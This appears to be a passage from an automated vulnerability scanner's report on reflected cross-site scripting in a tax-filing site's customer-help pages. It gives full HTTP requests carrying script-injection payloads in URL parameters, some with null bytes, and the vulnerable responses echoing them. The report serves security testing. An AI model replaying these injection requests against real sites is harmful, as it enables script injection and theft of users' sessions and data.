src="/rnt/rnw/javascript/enduser.js"></script> <script type="text/javascript"> var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:"); function putCustomFieldMasks(formName) { for(i = 0; i < chat_fields.length; i++) if(chat_fields[i].name.match('_input_icf_')) if(document[formName]['custom_text_' + chat_fields[i].name]) put_mask(chat_fields[i].name, document[formName]['custom_text_' + chat_fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + chat_fields[i].name]) { put_mask(chat_fields[i].name, document[formName]['custom_text_lh_' + chat_fields[i].name].value, document[formName], 0); $(chat_fields[i].name + '_mask').innerHTML=''; } } </script> </head> <body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"> <br /> <!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=OLTFree73541&p_sid=uiR-2Ksk&amp;p_accessibility=1&amp;p_redirect='"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0006EB)%5C/script%5E&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=OLTFree73541&p_sid=uiR-2Ksk&amp;p_accessibility=1&amp;p_redirect='"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0006EB)%5C/script%5E&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/seltabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="seltab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="seltab" name="live_help_tab_link" href="chat.php?OLTSite=OLTFree73541&p_sid=uiR-2Ksk&amp;p_accessibility=1&amp;p_redirect='"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0006EB)%5C/script%5E&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/seltabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=OLTFree73541&p_sid=uiR-2Ksk&amp;p_accessibility=1&amp;p_redirect='"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0006EB)%5C/script%5E&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect='"--></style></script><script>netsparker(0x0006EB)</script>"> hide accessible links </a> &nbsp;</td> <td width="1%" valign="bottom"> <table width="1%" cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1%" class="tabbtn" align="left" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> <td width="2%" name="_tab" class="tabbtn" align="center" valign="middle" nowrap rowspan="2"> <a class="tabbtn" href="help_general.php?OLTSite=OLTFree73541&p_sid=uiR-2Ksk&amp;p_accessibility=1&amp;p_redirect='"--></style></script><script>netsparker(0x0006EB)</script>&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x"> &nbsp;&nbsp;Help&nbsp;&nbsp; </a> </td> <td width="1%" class="tabbtn" align="right" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> </tr> <tr> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> </tr> </table> </td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="11"> &nbsp; </td> </tr> <tr><td colspan="10"></td></tr> <tr><td colspan="10"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table> <table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td> <td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td> <td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td> </tr> <tr> <td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td> <td class="form"> <form name="frm_chat_data" id="frm_chat_data" action="https://ssbcvipmw01.rightnowtech.com/Chat/live_tc.jsp?p_db_name=olt&p_intf_id=1" method="post" target="chatWindow" onsubmit="return false;"> <table id="tbl_enable_javascript" name="tbl_enable_javascript" align="center" style="display: none"> <tr> <td align="center">You must enable JavaScript in order to use Chat. Please enable your browser's JavaScript setting for this site and refresh this page.</td> </tr> </table> <table id="tbl_login" name="tbl_login" width="100%" cellspacing="1" cellpadding="1" border="0" > <tr> <td colspan="2" class="subtitle"> <table cellpadding="1" cellspacing="0" border="0"> <tr><td class="bar" colspan="2"><h2 class="subtitle" >&nbsp;Chat with a Support Agent</h2></td></tr> </table> </td> </tr> <!-- Notes ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="label" colspan=..
- /cgi-bin/olt.cfg/php/enduser/chat.php

/cgi-bin/olt.cfg/php/enduser/chat.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/chat.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk..

Parameters

Parameter Type Value
OLTSite GET OLTFree73541
p_sid GET TyYLtJsk
p_accessibility GET 0
p_redirect GET 3
p_sp GET cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x'"--></style></script><script>alert(0x0006EF)</script>

Request

GET /cgi-bin/olt.cfg/php/enduser/chat.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=3&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x0006EF)%3C%2Fscript%3E HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/std_alp.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:55:54 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=75790 t=1304117754196821
RNT-Machine: 12
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4322
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><script type="text/javascript">var $ = getItem; function getItem(id){ return document.getElementById(id);}// This function contained in util.phph; this should be prunedfunction strip_format(vstr, mask_fld){ var i, j, ln = mask_fld.length, dstr; if (!ln || !vstr) return(vstr); for (i = j = 0, dstr = ''; i < ln; i++) { if (mask_fld.charAt(i++) == 'F') j++; else dstr += vstr.charAt(j++); } return(dstr);}function verifyAndLaunch(form){ var cfInput; add_prodcat_vals(form); if(!verifyData(form)) return false;//Copy field values from form input fields into their hidden field counterparts. This is being done primarily so we can strip any masked fields//before sending. $('_icf_8').value = $('_input_icf_8').value; $('_icf_9').value = $('_input_icf_9').value; $('_icf_10').value = $('_input_icf_10').value; launchChat(); form.submit();}function verifyData(form){ if(!_check_fields(form.name, fld_data, chat_fields)) return false; if(!prodcat_check_fields(form.name, fld_data, form.p_prods.value, form.p_cats.value, 1, 0)) return false; return true;}function launchChat(){ var leftPos = (screen.width / 2) - 325; var topPos = (screen.height / 2) - 265; chatWindow = window.open('about:blank', 'chatWindow', 'status=1,toolbar=0,menubar=0,location=0,resizable=1,height=530px,width=640px,left=' + leftPos + ',top=' + topPos);}</script><html lang="en_US"> <head> <meta http-equiv="Pragma" content="no-cache"/> <meta http-equiv="Expires" content="-1"/> <meta name="robots" content="noindex,nofollow"> <link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"> <title>Live Assistance</title> <script type="text/javascript" src="/rnt/rnw/javascript/enduser.js"></script> <script type="text/javascript"> var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:"); function putCustomFieldMasks(formName) { for(i = 0; i < chat_fields.length; i++) if(chat_fields[i].name.match('_input_icf_')) if(document[formName]['custom_text_' + chat_fields[i].name]) put_mask(chat_fields[i].name, document[formName]['custom_text_' + chat_fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + chat_fields[i].name]) { put_mask(chat_fields[i].name, document[formName]['custom_text_lh_' + chat_fields[i].name].value, document[formName], 0); $(chat_fields[i].name + '_mask').innerHTML=''; } } </script> </head> <body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"> <br /> <!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=OLTFree73541&p_sid=86H_2Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0006EF)%5C/script%5E">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=OLTFree73541&p_sid=86H_2Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0006EF)%5C/script%5E">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/seltabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="seltab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="seltab" name="live_help_tab_link" href="chat.php?OLTSite=OLTFree73541&p_sid=86H_2Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0006EF)%5C/script%5E">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/seltabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=OLTFree73541&p_sid=86H_2Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x0006EF)%5C/script%5E">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> <td width="1%" valign="bottom"> <table width="1%" cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1%" class="tabbtn" align="left" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> <td width="2%" name="_tab" class="tabbtn" align="center" valign="middle" nowrap rowspan="2"> <a class="tabbtn" href="help_general.php?OLTSite=OLTFree73541&p_sid=86H_2Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x'"--></style></script><script>netsparker(0x0006EF)</script>"> &nbsp;&nbsp;Help&nbsp;&nbsp; </a> </td> <td width="1%" class="tabbtn" align="right" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> </tr> <tr> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> </tr> </table> </td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="11"> &nbsp; </td> </tr> <tr><td colspan="10"></td></tr> <tr><td colspan="10"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table> <table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td> <td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td> <td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td> </tr> <tr> <td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td> <td class="form"> <form name="frm_chat_data" id="frm_chat_data" action="https://ssbcvipmw01.rightnowtech.com/Chat/live_tc.jsp?p_db_name=olt&p_intf_id=1" method="post" target="chatWindow" onsubmit="return false;"> <table id="tbl_enable_javascript" name="tbl_enable_javascript" align="center" style="display: none"> <tr> <td align="center">You must enable JavaScript in order to use Chat. Please enable your browser's JavaScript setting for this site and refresh this page.</td> </tr> </table> <table id="tbl_login" name="tbl_login" width="100%" cellspacing="1" cellpadding="1" border="0" > <tr> <td colspan="2" class="subtitle"> <table cellpadding="1" cellspacing="0" border="0"> <tr><td class="bar" colspan="2"><h2 class="subtitle" >&nbsp;Chat with a Support Agent</h2></td></tr> </table> </td> </tr> <!-- Notes ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="label" colspan="2">Please Note: <br /> <table cellpadding="0&quo..
- /cgi-bin/olt.cfg/php/enduser/help_general.php

/cgi-bin/olt.cfg/php/enduser/help_general.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/help_general.php?OLTSite=OLTFree%0073541%00%27%..

Parameters

Parameter Type Value
OLTSite GET OLTFree73541'"--></style></script><script>alert(0x000770)</script>
p_sid GET TyYLtJsk
p_accessibility GET 0
p_redirect GET 3
p_sp GET cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x

Request

GET /cgi-bin/olt.cfg/php/enduser/help_general.php?OLTSite=OLTFree%0073541%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000770)%3C%2Fscript%3E&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=3&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/std_alp.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:57:19 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=61404 t=1304117839682561
RNT-Machine: 07
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4171
X-Cnection: close
Content-Type: text/html; charset=UTF-8


